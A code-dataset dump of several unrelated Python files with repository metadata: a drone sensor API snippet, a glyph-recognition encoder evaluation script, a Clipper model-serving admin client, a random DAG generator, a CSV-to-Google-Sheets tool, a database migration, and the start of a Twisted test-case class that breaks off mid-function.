def get_absolute_height(self):
"""
return: int
"""
return self.get('baro?')
def get_imu_acceleration(self):
"""
return: list(int)
"""
return self.get('acceleration?', split=True)
def get_tof_height(self):
"""
return: int, [10, 400]; 6553: out of bounds
"""
return self.get('tof?')
| 3.1875 | 3 |
terrascript/resource/sematext.py | mjuenema/python-terrascript | 507 | 1230 | <filename>terrascript/resource/sematext.py
# terrascript/resource/sematext.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:26:36 UTC)
#
# For imports without namespace, e.g.
#
# >>> import terrascript.resource.sematext
#
# instead of
#
# >>> import terrascript.resource.sematext.sematext
#
# This is only available for 'official' and 'partner' providers.
from terrascript.resource.sematext.sematext import *
| 1.21875 | 1 |
eval_encoder.py | lithium0003/Image2UTF8-Transformer | 0 | 1231 | #!/usr/bin/env python3
import tensorflow as tf
physical_devices = tf.config.list_physical_devices('GPU')
try:
tf.config.experimental.set_memory_growth(physical_devices[0], True)
except:
# Invalid device or cannot modify virtual devices once initialized.
pass
import numpy as np
import os, time, csv
import tqdm
import umap
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import datetime
import signal
import net
from matplotlib import rcParams
rcParams['font.family'] = 'sans-serif'
rcParams['font.sans-serif'] = ['Hiragino Maru Gothic Pro', 'Yu Gothic', 'Meirio', 'Takao', 'IPAexGothic', 'IPAPGothic', 'Noto Sans CJK JP']
import net
class SimpleEncodeDecoder:
def __init__(self):
self.save_dir = './result/step1/'
self.result_dir = './result/plot/'
os.makedirs(self.result_dir, exist_ok=True)
checkpoint_dir = self.save_dir
self.max_epoch = 300
self.steps_per_epoch = 1000
self.batch_size = 64
lr = tf.keras.optimizers.schedules.ExponentialDecay(1e-3, 1e5, 0.5)
self.optimizer = tf.keras.optimizers.Adam(lr)
self.encoder = net.FeatureBlock()
self.encoder.summary()
self.decoder = net.SimpleDecoderBlock()
self.decoder.summary()
inputs = {
'image': tf.keras.Input(shape=(128,128,3)),
}
feature_out = self.encoder(inputs)
outputs = self.decoder(feature_out)
self.model = tf.keras.Model(inputs, outputs, name='SimpleEncodeDecoder')
checkpoint = tf.train.Checkpoint(optimizer=self.optimizer,
model=self.model)
last = tf.train.latest_checkpoint(checkpoint_dir)
checkpoint.restore(last)
self.manager = tf.train.CheckpointManager(
checkpoint, directory=checkpoint_dir, max_to_keep=2)
if not last is None:
self.init_epoch = int(os.path.basename(last).split('-')[1])
print('loaded %d epoch'%self.init_epoch)
else:
self.init_epoch = 0
self.model.summary()
def eval(self):
self.data = net.FontData()
print("Plot: ", self.init_epoch + 1)
acc = self.make_plot(self.data.test_data(self.batch_size), (self.init_epoch + 1))
print('acc', acc)
@tf.function
def eval_substep(self, inputs):
input_data = {
'image': inputs['input'],
}
feature = self.encoder(input_data)
outputs = self.decoder(feature)
target_id = inputs['index']
target_id1 = inputs['idx1']
target_id2 = inputs['idx2']
pred_id1 = tf.nn.softmax(outputs['id1'], -1)
pred_id2 = tf.nn.softmax(outputs['id2'], -1)
return {
'feature': feature,
'pred_id1': pred_id1,
'pred_id2': pred_id2,
'target_id': target_id,
'target_id1': target_id1,
'target_id2': target_id2,
}
def make_plot(self, test_ds, epoch):
result = []
labels = []
with open(os.path.join(self.result_dir,'test_result-%d.txt'%epoch),'w') as txt:
correct_count = 0
failed_count = 0
with tqdm.tqdm(total=len(self.data.test_keys)) as pbar:
for inputs in test_ds:
pred = self.eval_substep(inputs)
result += [pred['feature']]
labels += [pred['target_id']]
for i in range(pred['target_id1'].shape[0]):
txt.write('---\n')
target = pred['target_id'][i].numpy()
txt.write('target: id %d = %s\n'%(target, self.data.glyphs[target-1]))
predid1 = np.argmax(pred['pred_id1'][i])
predid2 = np.argmax(pred['pred_id2'][i])
predid = predid1 * 100 + predid2
if predid == 0:
txt.write('predict: id %d nothing (p=%f)\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))
elif predid > self.data.id_count + 1:
txt.write('predict: id %d nothing (p=%f)\n'%(predid, pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))
else:
txt.write('predict: id %d = %s (p=%f)\n'%(predid, self.data.glyphs[predid-1], pred['pred_id1'][i][predid1] * pred['pred_id2'][i][predid2]))
if target == predid:
txt.write('Correct!\n')
correct_count += 1
else:
txt.write('Failed!\n')
failed_count += 1
pbar.update(1)
acc = correct_count / (correct_count + failed_count)
txt.write('==============\n')
txt.write('Correct = %d\n'%correct_count)
txt.write('Failed = %d\n'%failed_count)
txt.write('accuracy = %f\n'%acc)
result = np.concatenate(result)
labels = np.concatenate(labels)
print('run UMAP')
X_reduced = umap.UMAP(metric='cosine').fit_transform(result)
fig, ax = plt.subplots(figsize=(50, 50))
ax.scatter(X_reduced[:, 0], X_reduced[:, 1], c=labels, cmap=plt.get_cmap('hsv'))
print('plot UMAP')
for i, label in enumerate(labels):
ax.annotate(self.data.glyphs[label-1], (X_reduced[i,0], X_reduced[i,1]))
plt.savefig(os.path.join(self.result_dir,'test_result-%d.png'%epoch), dpi=300)
plt.close('all')
return acc
def eval():
encoder = SimpleEncodeDecoder()
encoder.eval()
if __name__ == '__main__':
eval()
| 2.0625 | 2 |
clipper_admin/clipper_admin/clipper_admin.py | SimonZsx/clipper | 2 | 1232 | from __future__ import absolute_import, division, print_function
import logging
import docker
import tempfile
import requests
from requests.exceptions import RequestException
import json
import pprint
import time
import re
import os
import tarfile
import sys
from cloudpickle import CloudPickler
import pickle
import numpy as np
from google.protobuf.json_format import MessageToDict
if sys.version_info < (3, 0):
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
PY3 = False
else:
from io import BytesIO as StringIO
PY3 = True
import grpc
from .rpc import model_pb2_grpc
from .rpc import model_pb2
from .rpc import prediction_pb2_grpc
from .rpc import prediction_pb2
from .rpc import management_pb2
from .rpc import management_pb2_grpc
from .container_manager import CONTAINERLESS_MODEL_IMAGE, ClusterAdapter
from .exceptions import ClipperException, UnconnectedException
from .version import __version__, __registry__
from . import graph_parser
DEFAULT_LABEL = []
DEFAULT_PREDICTION_CACHE_SIZE_BYTES = 33554432
CLIPPER_TEMP_DIR = "/tmp/clipper" # Used Internally for Test; Not Windows Compatible
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
datefmt='%y-%m-%d:%H:%M:%S',
level=logging.INFO)
# logging.basicConfig(
# format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s',
# datefmt='%y-%m-%d:%H:%M:%S',
# level=logging.INFO)
logger = logging.getLogger(__name__)
deploy_regex_str = "[a-z0-9]([-a-z0-9]*[a-z0-9])?\Z"
deployment_regex = re.compile(deploy_regex_str)
def _validate_versioned_model_name(name, version):
if deployment_regex.match(name) is None:
raise ClipperException(
"Invalid value: {name}: a model name must be a valid DNS-1123 "
" subdomain. It must consist of lower case "
"alphanumeric characters, '-' or '.', and must start and end with "
"an alphanumeric character (e.g. 'example.com', regex used for "
"validation is '{reg}'".format(name=name, reg=deploy_regex_str))
if deployment_regex.match(version) is None:
raise ClipperException(
"Invalid value: {version}: a model version must be a valid DNS-1123 "
" subdomain. It must consist of lower case "
"alphanumeric characters, '-' or '.', and must start and end with "
"an alphanumeric character (e.g. 'example.com', regex used for "
"validation is '{reg}'".format(
version=version, reg=deploy_regex_str))
class ClipperConnection(object):
def __init__(self, container_manager):
self.connected = False
self.cm = container_manager
#############TEST################
self.runtime_dag = ""
self.lock = False
#################################
self.logger = ClusterAdapter(logger, {
'cluster_name': self.cm.cluster_identifier
})
def start_clipper(self,
mgmt_frontend_image='{}/management_frontend:{}'.format(
__registry__, __version__),
cache_size=DEFAULT_PREDICTION_CACHE_SIZE_BYTES):
try:
self.cm.start_clipper(mgmt_frontend_image)
# while True:
# try:
# query_frontend_url = "http://{host}/metrics".format(
# host=self.cm.get_query_addr())
# mgmt_frontend_url = "http://{host}/admin/ping".format(
# host=self.cm.get_admin_addr())
# for name, url in [('query frontend', query_frontend_url),
# ('management frontend', mgmt_frontend_url)]:
# r = requests.get(url, timeout=5)
# if r.status_code != requests.codes.ok:
# raise RequestException(
# "{name} end point {url} health check failed".format(name=name, url=url))
# break
# except RequestException as e:
# self.logger.info("Clipper still initializing: \n {}".format(e))
# time.sleep(1)
self.logger.info("Clipper is running")
self.connected = True
except ClipperException as e:
self.logger.warning("Error starting Clipper: {}".format(e.msg))
raise e
def connect(self):
"""Connect to a running Clipper cluster."""
self.cm.connect()
self.connected = True
self.logger.info(
"Successfully connected to Clipper cluster at {}".format(
self.cm.get_query_addr()))
def build_and_deploy_DAG(self,
name,
version,
dag_description,
labels):
if not self.connected:
raise UnconnectedException()
def build_and_deploy_model(self,
name,
version,
input_type,
model_data_path,
base_image,
labels=None,
container_registry=None,
num_replicas=1,
batch_size=-1,
pkgs_to_install=None):
if not self.connected:
raise UnconnectedException()
image = self.build_model(name, version, model_data_path, base_image,
container_registry, pkgs_to_install)
self.deploy_model(name, version, input_type, image, labels,
num_replicas, batch_size)
def build_model(self,
name,
version,
model_data_path,
base_image,
container_registry=None,
pkgs_to_install=None):
version = str(version)
_validate_versioned_model_name(name, version)
run_cmd = ''
if pkgs_to_install:
run_as_lst = 'RUN apt-get -y install build-essential && pip install'.split(
' ')
run_cmd = ' '.join(run_as_lst + pkgs_to_install)
with tempfile.NamedTemporaryFile(
mode="w+b", suffix="tar") as context_file:
# Create build context tarfile
with tarfile.TarFile(
fileobj=context_file, mode="w") as context_tar:
context_tar.add(model_data_path)
# From https://stackoverflow.com/a/740854/814642
try:
df_contents = StringIO(
str.encode(
"FROM {container_name}\n{run_command}\nCOPY {data_path} /model/\n".
format(
container_name=base_image,
data_path=model_data_path,
run_command=run_cmd)))
df_tarinfo = tarfile.TarInfo('Dockerfile')
df_contents.seek(0, os.SEEK_END)
df_tarinfo.size = df_contents.tell()
df_contents.seek(0)
context_tar.addfile(df_tarinfo, df_contents)
except TypeError:
df_contents = StringIO(
"FROM {container_name}\n{run_command}\nCOPY {data_path} /model/\n".
format(
container_name=base_image,
data_path=model_data_path,
run_command=run_cmd))
df_tarinfo = tarfile.TarInfo('Dockerfile')
df_contents.seek(0, os.SEEK_END)
df_tarinfo.size = df_contents.tell()
df_contents.seek(0)
context_tar.addfile(df_tarinfo, df_contents)
# Exit Tarfile context manager to finish the tar file
# Seek back to beginning of file for reading
context_file.seek(0)
image = "{cluster}-{name}:{version}".format(
cluster=self.cm.cluster_identifier, name=name, version=version)
if container_registry is not None:
image = "{reg}/{image}".format(
reg=container_registry, image=image)
docker_client = docker.from_env()
self.logger.info(
"Building model Docker image with model data from {}".format(
model_data_path))
image_result, build_logs = docker_client.images.build(
fileobj=context_file, custom_context=True, tag=image)
for b in build_logs:
if 'stream' in b and b['stream'] != '\n': #log build steps only
self.logger.info(b['stream'].rstrip())
self.logger.info("Pushing model Docker image to {}".format(image))
for line in docker_client.images.push(repository=image, stream=True):
self.logger.debug(line)
return image
def deploy_model(self,
name,
version,
input_type,
image,
labels=None,
num_replicas=1,
batch_size=-1):
if not self.connected:
raise UnconnectedException()
version = str(version)
_validate_versioned_model_name(name, version)
self.cm.deploy_model(
name=name,
version=version,
input_type=input_type,
image=image,
num_replicas=num_replicas)
# self.register_model(
# name,
# version,
# input_type,
# image=image,
# labels=labels,
# batch_size=batch_size)
self.logger.info("Done deploying model {name}:{version}.".format(
name=name, version=version))
def connect_host(self, host_ip, host_port):
self.cm.connect_host(host_ip, "2375")
def add_model(self,
model_name,
model_version,
image,
input_type="string",
output_type="string",
stateful=False):
modelinfo = management_pb2.ModelInfo(modelname=model_name,
modelversion=model_version,
image=image,
inputtype=input_type,
outputtype=output_type,
stateful=stateful).SerializeToString()
self.cm.grpc_client("zsxhku/grpcclient", "--addmodel %s %s %s "%("localhost","33333", modelinfo))
return
def deploy_DAG(self, name, version, dag_description=None, runtime=""):
if not self.connected:
raise UnconnectedException()
# model_info = self.get_all_models()
dag_description_ = dag_description
#self.logger.info("dag_description: %s"%(dag_description_))
#if(dag_description==None):
# dag_description_=self.get_dag_description()
nodes_list = graph_parser.get_all_nodes(dag_description_)
container_info = []
proxy_info = []
backup_info = []
count = 1
for model_info in nodes_list:
model_name,model_version,model_image = graph_parser.get_name_version(model_info)
container_name, container_id, host = self.cm.add_replica(model_name, model_version, "22222", model_image, runtime=runtime)
self.logger.info("Started %s with container %s:%s (HOST:%s)"%(model_name, container_name, container_id, host))
container_ip = self.cm.get_container_ip(host, container_id)
proxy_name, proxy_id = self.cm.set_proxy("mxschen/ai-proxy:latest", container_name, container_ip, host)
## get the ip of the instances
proxy_ip = self.cm.get_container_ip(host, proxy_id)
proxy_info.append([proxy_name,proxy_id,proxy_ip])
container_info.append([container_name, container_id, container_ip])
if graph_parser.is_stateful(model_info):
backup_name, backup_id, backup_host = self.cm.add_replica(model_name, model_version, "22222", model_image)
self.logger.info("[Backup] Started %s with container %s:%s (HOST:%s)"%(model_name, backup_name, backup_id, backup_host))
backup_ip = self.cm.get_container_ip(backup_host, backup_id)
backup_proxy_name, backup_proxy_id = self.cm.set_proxy("mxschen/ai-proxy:latest", backup_name, backup_ip, backup_host)
backup_proxy_ip= self.cm.get_container_ip(backup_host, backup_proxy_id)
backup_info.append([backup_name, backup_id, backup_ip, backup_proxy_name, backup_proxy_id, backup_proxy_ip])
else:
backup_info.append([])
#self.cm.check_container_status(host, container_id, 0.3, 20)
#self.cm.check_container_status(host, proxy_id, 0.3, 20)
#time.sleep(25)
#self.logger.info("proxy_ip:%s"%(proxy_ip))
self.cm.grpc_client("zsxhku/grpcclient", "--setmodel %s %s %s %s %s %s"%(proxy_ip, "22223", container_name, count, container_ip, "22222" ))
self.logger.info('[DEPLOYMENT] Finished setting model info to proxy')
if(graph_parser.is_stateful(model_info)):
self.cm.grpc_client("zsxhku/grpcclient", "--setmodel %s %s %s %s %s %s"%(backup_info[-1][-1], "22223", backup_info[-1][0], count, backup_info[-1][2], "22222" ))
self.logger.info('[DEPLOYMENT][Backup] Finished setting model info to proxy')
count += 1
# self.cm.grpc_client("zsxhku/grpcclient", "--setproxy %s %s %s %s"%(container_ip, "22222", proxy_name, "22223"))
# self.logger.info('[DEPLOYMENT] Finished setting proxy info to model')
# if(graph_parser.is_stateful(model_info)):
# self.cm.grpc_client("zsxhku/grpcclient", "--setproxy %s %s %s %s"%(backup_info[-1][2], "22222", backup_info[-1][3], "22223"))
# self.logger.info('[DEPLOYMENT][Backup] Finished setting proxy info to model')
runtime_dag_id = name+version+str(1)
## Starting frontend
frontend_name, frontend_container_id = self.cm.add_frontend("localhost", "mxschen/frontend",runtime_dag_id, proxy_info[0][2], "22223", max_workers=2048)
frontend_ip = self.cm.get_container_ip("localhost", frontend_container_id)
frontend_info = [frontend_name, frontend_container_id, frontend_ip]
self.logger.info("[DEPLOYMENT] ################ Started Frontend #################")
#expand the dag description with the model/proxy instances info
expanded_dag = graph_parser.expand_dag(dag_description_, name, version, container_info, proxy_info, backup_info, frontend_info)
self.runtime_dag = expanded_dag
# TODO: need to modularize
self.cm.grpc_client("zsxhku/grpcclient", "--addruntimedag %s %s %s %s %s %s %s"%('1', name, version, 'old' , self.cm.admin_ip, self.cm.admin_port, expanded_dag))
self.logger.info("Added new runtime DAG to admin daemon\n%s"%(expanded_dag))
#tells the proxy runtime dag info
for tup in proxy_info:
proxy_name = tup[0]
proxy_id = tup[1]
proxy_ip = tup[2]
self.cm.grpc_client("zsxhku/grpcclient", "--setdag %s %s %s"%(proxy_ip, "22223", expanded_dag))
self.logger.info('[DEPLOYMENT] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=proxy_name))
#tells the backups runtime dag info
for tup in backup_info:
if tup:
self.cm.grpc_client("zsxhku/grpcclient", "--setdag %s %s %s"%(tup[-1], "22223", expanded_dag))
self.logger.info('[DEPLOYMENT][Backup] Finished setting DAG for proxy {proxy_name} '.format(proxy_name=tup[-1]))
return
def inspect_instance(self):
"""Fetches performance metrics from the running Clipper cluster.
Returns
-------
str
The JSON string containing the current set of metrics
for this instance. On error, the string will be an error message
(not JSON formatted).
Raises
------
:py:exc:`clipper.UnconnectedException`
:py:exc:`clipper.ClipperException`
"""
def get_query_addr(self):
"""Get the IP address at which the query frontend can be reached request predictions.
Returns
-------
str
The address as an IP address or hostname.
Raises
------
:py:exc:`clipper.UnconnectedException`
versions. All replicas for each version of each model will be stopped.
"""
if not self.connected:
raise UnconnectedException()
return self.cm.get_query_addr()
def stop_models(self, model_names):
"""Stops all versions of the specified models.
This is a convenience method to avoid the need to explicitly list all versions
of a model when calling :py:meth:`clipper_admin.ClipperConnection.stop_versioned_models`.
Parameters
----------
model_names : list(str)
A list of model names. All replicas of all versions of each model specified in the list
will be stopped.
Raises
------
:py:exc:`clipper.UnconnectedException`
versions. All replicas for each version of each model will be stopped.
"""
# if not self.connected:
# raise UnconnectedException()
# model_info = self.get_all_models(verbose=True)
# model_dict = {}
# for m in model_info:
# if m["model_name"] in model_names:
# if m["model_name"] in model_dict:
# model_dict[m["model_name"]].append(m["model_version"])
# else:
# model_dict[m["model_name"]] = [m["model_version"]]
# self.cm.stop_models(model_dict)
# pp = pprint.PrettyPrinter(indent=4)
# self.logger.info(
# "Stopped all containers for these models and versions:\n{}".format(
# pp.pformat(model_dict)))
def stop_versioned_models(self, model_versions_dict):
"""Stops the specified versions of the specified models.
Parameters
----------
model_versions_dict : dict(str, list(str))
For each entry in the dict, the key is a model name and the value is a list of model
Raises
------
:py:exc:`clipper.UnconnectedException`
versions. All replicas for each version of each model will be stopped.
Note
----
This method will stop the currently deployed versions of models if you specify them. You
almost certainly want to use one of the other stop_* methods. Use with caution.
"""
# if not self.connected:
# raise UnconnectedException()
# self.cm.stop_models(model_versions_dict)
# pp = pprint.PrettyPrinter(indent=4)
# self.logger.info(
# "Stopped all containers for these models and versions:\n{}".format(
# pp.pformat(model_versions_dict)))
def stop_inactive_model_versions(self, model_names):
"""Stops all model containers serving stale versions of the specified models.
For example, if you have deployed versions 1, 2, and 3 of model "music_recommender"
and version 3 is the current version::
clipper_conn.stop_inactive_model_versions(["music_recommender"])
will stop any containers serving versions 1 and 2 but will leave containers serving
version 3 untouched.
Parameters
----------
model_names : list(str)
The names of the models whose old containers you want to stop.
Raises
------
:py:exc:`clipper.UnconnectedException`
"""
# if not self.connected:
# raise UnconnectedException()
# model_info = self.get_all_models(verbose=True)
# model_dict = {}
# for m in model_info:
# if m["model_name"] in model_names and not m["is_current_version"]:
# if m["model_name"] in model_dict:
# model_dict[m["model_name"]].append(m["model_version"])
# else:
# model_dict[m["model_name"]] = [m["model_version"]]
# self.cm.stop_models(model_dict)
# pp = pprint.PrettyPrinter(indent=4)
# self.logger.info(
# "Stopped all containers for these models and versions:\n{}".format(
# pp.pformat(model_dict)))
def stop_all_model_containers(self):
"""Stops all model containers started via Clipper admin commands.
This method can be used to clean up leftover Clipper model containers even if the
Clipper management frontend or Redis has crashed. It can also be called without calling
``connect`` first.
"""
self.cm.stop_all_model_containers()
self.logger.info("Stopped all Clipper model containers")
def stop_all(self, graceful=True):
"""Stops all processes that were started via Clipper admin commands.
This includes the query and management frontend Docker containers and all model containers.
If you started Redis independently, this will not affect Redis. It can also be called
without calling ``connect`` first.
If graceful=False, Clipper will issue Docker Kill if it's in the Docker Mode. This parameter
will take not effect in Kubernetes.
"""
self.cm.stop_all(graceful=graceful)
self.logger.info(
"Stopped all Clipper cluster and all model containers")
| 1.59375 | 2 |
graph.py | VaniSHadow/tpGenerator | 0 | 1233 | import random
import numpy
import copy
class Graph:
"""n表示图中点的个数,m表示图中边的个数"""
def __init__(self, n, m, edge_weight=1, directed=True, connected='weak', loop=False, weighted=False, trim=True):
"""
n 图中点的个数
m 图中边的个数
edge_weight 边的权值上限
directed 有向性
connected 连通性
loop 有环性
weighted 带权性
trim True:点编号从1开始 False:点编号从0开始
"""
self.directed = directed
self.weighted = weighted
self.connected = connected
self.loop = loop
self.trim = trim
if directed==True and connected=='weak' and loop==False:#弱连通有向无环
self.n = n
self.m = m
self.matr = numpy.zeros((n, n))
self.topo = list(range(n))
random.shuffle(self.topo)
self.RandomGenerTopoEdges(m-(n-1))
weak_connected = self.CheckWeakConnectivity()
if weak_connected:
self.RandomGenerTopoEdges(n-1)
else:
count = 0
for i in range(n-1):
if self.matr[self.topo[i]][self.topo[i+1]]!=1:
self.matr[self.topo[i]][self.topo[i+1]]=1
count = count+1
self.RandomGenerTopoEdges(n-1-count)
self.edges = list()
for i in range(n):
for j in range(n):
if self.matr[i][j]==1:
e = (i, j)
self.edges.append(e)
"""检查图的弱连通性"""
def CheckWeakConnectivity(self):
temp = copy.deepcopy(self.matr)
for i in range(self.n):
for j in range(self.n):
if temp[i][j]==1:
temp[j][i]=1
elif temp[j][i]==1:
temp[i][j]=1
for i in range(self.n-1):
if i==0:
result = temp.dot(temp)
else:
result = result.dot(temp)
for i in range(self.n):
for j in range(self.n):
if result[i][j]==0 and i!=j:
return False
return True
"""在图中随机生成edge_num条边"""
def RandomGenerTopoEdges(self, edge_num):
for i in range(edge_num):
mid = random.randint(1, self.n-2)
st = random.randint(0, mid)
end = random.randint(mid+1, self.n-1)
while self.matr[self.topo[st]][self.topo[end]] != 0:
mid = random.randint(1, self.n-2)
st = random.randint(0, mid)
end = random.randint(mid+1, self.n-1)
self.matr[self.topo[st]][self.topo[end]] = 1
"""以字符串返回第i条边的信息"""
def GetEdge(self, i):
if self.trim:#点从1开始
if self.weighted == False:
return str(self.edges[i][0]+1) + " " + str(self.edges[i][1]+1)
else:
return str(self.edges[i][0]+1) + " " + str(self.edges[i][1]+1) + random.randint(1, edge_weight)
else:#点从0开始
if self.weighted == False:
return str(self.edges[i][0]) + " " + str(self.edges[i][1])
else:
return str(self.edges[i][0]) + " " + str(self.edges[i][1]) + random.randint(1, edge_weight)
| 3.15625 | 3 |
csv2googlesheets/to_google_sheets.py | AlexSkrn/csv2googlesheets | 0 | 1234 | <filename>csv2googlesheets/to_google_sheets.py
"""This module provides a console interface to convert CSV to Google Sheets."""
from csv2googlesheets.gapi_authorization import auth_with_google
from csv2googlesheets.gapi_create_sheet import create_sheet
from csv2googlesheets.gapi_write_to_sheet import write_to_sheet
from csv2googlesheets.parse_file import build_spreadsheet_title
from csv2googlesheets.parse_file import parse_file
from csv2googlesheets.parse_cli_args import parse_cli_args
def main():
"""Control the flow of operations to write data from csv to G Sheets."""
cli_args = parse_cli_args()
values = parse_file(path=cli_args.csv)
spreadsheet_title = build_spreadsheet_title(cli_args.csv)
google_service = auth_with_google(path_creds=cli_args.credentials_json)
spreadsheet_id = create_sheet(google_service, spreadsheet_title)
write_to_sheet(
google_service,
sheet_id=spreadsheet_id,
values=values,
)
if __name__ == '__main__':
main()
| 3.140625 | 3 |
netforce_account/netforce_account/migrations/credit_remain_cur.py | nfco/netforce | 27 | 1235 | <reponame>nfco/netforce<gh_stars>10-100
from netforce.model import get_model
from netforce import migration
from netforce import database
class Migration(migration.Migration):
_name="account.credit_remain_cur"
_version="2.5.0"
def migrate(self):
db=database.get_connection()
db.execute("UPDATE account_invoice SET amount_credit_remain_cur=amount_credit_remain WHERE amount_credit_remain_cur IS NULL AND amount_credit_remain IS NOT NULL")
Migration.register()
| 2.4375 | 2 |
chevah/compat/testing/testcase.py | chevah/compat | 5 | 1236 | <gh_stars>1-10
# -*- coding: utf-8 -*-
# Copyright (c) 2011 <NAME>.
# See LICENSE for details.
"""
TestCase used for Chevah project.
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from six import text_type
from six.moves import range
import contextlib
import inspect
import threading
import os
import platform
import socket
import sys
import time
from bunch import Bunch
from mock import patch, Mock
from nose import SkipTest
try:
from twisted.internet.defer import Deferred
from twisted.internet.posixbase import (
_SocketWaker, _UnixWaker, _SIGCHLDWaker
)
from twisted.python.failure import Failure
except ImportError:
# Twisted support is optional.
_SocketWaker = None
_UnixWaker = None
_SIGCHLDWaker = None
from chevah.compat import (
DefaultAvatar,
LocalFilesystem,
process_capabilities,
system_users,
SuperAvatar,
)
from chevah.compat.administration import os_administration
from chevah.compat.testing.assertion import AssertionMixin
from chevah.compat.testing.mockup import mk
from chevah.compat.testing.constant import (
TEST_NAME_MARKER,
)
from chevah.compat.testing.filesystem import LocalTestFilesystem
# For Python below 2.7 we use the separate unittest2 module.
# It comes by default in Python 2.7.
if sys.version_info[0:2] < (2, 7):
from unittest2 import TestCase
# Shut up you linter.
TestCase
else:
from unittest import TestCase
try:
# Import reactor last in case some other modules are changing the reactor.
from twisted.internet import reactor
except ImportError:
reactor = None
def _get_hostname():
"""
Return hostname as resolved by default DNS resolver.
"""
return socket.gethostname()
class TwistedTestCase(TestCase):
"""
Test case for Twisted specific code.
Provides support for running deferred and start/stop the reactor during
tests.
"""
# Number of second to wait for a deferred to have a result.
DEFERRED_TIMEOUT = 1
# List of names for delayed calls which should not be considered as
# required to wait for them when running the reactor.
EXCEPTED_DELAYED_CALLS = []
EXCEPTED_READERS = [
_UnixWaker,
_SocketWaker,
_SIGCHLDWaker,
]
# Scheduled event to stop waiting for a deferred.
_reactor_timeout_call = None
def setUp(self):
super(TwistedTestCase, self).setUp()
self._timeout_reached = False
self._reactor_timeout_failure = None
@property
def _caller_success_member(self):
"""
Retrieve the 'success' member from the None test case.
"""
success = None
for i in range(2, 6):
try:
success = inspect.stack()[i][0].f_locals['success']
break
except KeyError:
success = None
if success is None:
raise AssertionError('Failed to find "success" attribute.')
return success
def tearDown(self):
try:
if self._caller_success_member:
# Check for a clean reactor at shutdown, only if test
# passed.
self.assertIsNone(self._reactor_timeout_failure)
self._assertReactorIsClean()
finally:
self._cleanReactor()
super(TwistedTestCase, self).tearDown()
def _reactorQueueToString(self):
"""
Return a string representation of all delayed calls from reactor
queue.
"""
result = []
for delayed in reactor.getDelayedCalls(): # noqa:cover
result.append(text_type(delayed.func))
return '\n'.join(result)
def _threadPoolQueue(self):
"""
Return current tasks of thread Pool, or [] when threadpool does not
exists.
This should only be called at cleanup as it removes elements from
the Twisted thread queue, which will never be called.
"""
if not reactor.threadpool:
return []
result = []
while len(reactor.threadpool._team._pending):
result.append(reactor.threadpool._team._pending.pop())
return result
def _threadPoolThreads(self):
"""
Return current threads from pool, or empty list when threadpool does
not exists.
"""
if not reactor.threadpool:
return []
else:
return reactor.threadpool.threads
def _threadPoolWorking(self):
"""
Return working thread from pool, or empty when threadpool does not
exists or has no job.
"""
if not reactor.threadpool:
return []
else:
return reactor.threadpool.working
@classmethod
def _cleanReactor(cls):
"""
Remove all delayed calls, readers and writers from the reactor.
This is only for cleanup purpose and should not be used by normal
tests.
"""
if not reactor:
return
try:
reactor.removeAll()
except (RuntimeError, KeyError):
# FIXME:863:
# When running threads tests the reactor touched from the test
# case itself which run in one tread and from the fixtures/cleanup
# code which is executed from another thread.
# removeAll might fail since it detects that internal state
# is changed from other source.
pass
reactor.threadCallQueue = []
for delayed_call in reactor.getDelayedCalls():
try:
delayed_call.cancel()
except (ValueError, AttributeError):
# AlreadyCancelled and AlreadyCalled are ValueError.
# Might be canceled from the separate thread.
# AttributeError can occur when we do multi-threading.
pass
def _raiseReactorTimeoutError(self, timeout):
"""
Signal an timeout error while executing the reactor.
"""
self._timeout_reached = True
failure = AssertionError(
'Reactor took more than %.2f seconds to execute.' % timeout)
self._reactor_timeout_failure = failure
def _initiateTestReactor(self, timeout):
"""
Do the steps required to initiate a reactor for testing.
"""
self._timeout_reached = False
# Set up timeout.
self._reactor_timeout_call = reactor.callLater(
timeout, self._raiseReactorTimeoutError, timeout)
# Don't start the reactor if it is already started.
# This can happen if we prevent stop in a previous run.
if reactor._started:
return
reactor._startedBefore = False
reactor._started = False
reactor._justStopped = False
reactor.startRunning()
def _iterateTestReactor(self, debug=False):
"""
Iterate the reactor.
"""
reactor.runUntilCurrent()
if debug: # noqa:cover
# When debug is enabled with iterate using a small delay in steps,
# to have a much better debug output.
# Otherwise the debug messages will flood the output.
print (
u'delayed: %s\n'
u'threads: %s\n'
u'writers: %s\n'
u'readers: %s\n'
u'threadpool size: %s\n'
u'threadpool threads: %s\n'
u'threadpool working: %s\n'
u'\n' % (
self._reactorQueueToString(),
reactor.threadCallQueue,
reactor.getWriters(),
reactor.getReaders(),
reactor.getThreadPool().q.qsize(),
self._threadPoolThreads(),
self._threadPoolWorking(),
)
)
t2 = reactor.timeout()
# For testing we want to force to reactor to wake at an
# interval of at most 1 second.
if t2 is None or t2 > 1:
t2 = 0.1
t = reactor.running and t2
reactor.doIteration(t)
else:
# FIXME:4428:
# When not executed in debug mode, some test will fail as they
# will not spin the reactor.
# To not slow down all the tests, we run with a very small value.
reactor.doIteration(0.000001)
def _shutdownTestReactor(self, prevent_stop=False):
"""
Called at the end of a test reactor run.
When prevent_stop=True, the reactor will not be stopped.
"""
if not self._timeout_reached:
# Everything fine, disable timeout.
if (
self._reactor_timeout_call and
not self._reactor_timeout_call.cancelled
):
self._reactor_timeout_call.cancel()
if prevent_stop:
# Don't continue with stop procedure.
return
# Let the reactor know that we want to stop reactor.
reactor.stop()
# Let the reactor run one more time to execute the stop code.
reactor.iterate()
# Set flag to fake a clean reactor.
reactor._startedBefore = False
reactor._started = False
reactor._justStopped = False
reactor.running = False
# Start running has consumed the startup events, so we need
# to restore them.
reactor.addSystemEventTrigger(
'during', 'startup', reactor._reallyStartRunning)
def _assertReactorIsClean(self):
"""
Check that the reactor has no delayed calls, readers or writers.
This should only be called at teardown.
"""
if reactor is None:
return
def raise_failure(location, reason):
raise AssertionError(
'Reactor is not clean. %s: %s' % (location, reason))
if reactor._started: # noqa:cover
# Reactor was not stopped, so stop it before raising the error.
self._shutdownTestReactor()
raise AssertionError('Reactor was not stopped.')
# Look at threads queue.
if len(reactor.threadCallQueue) > 0:
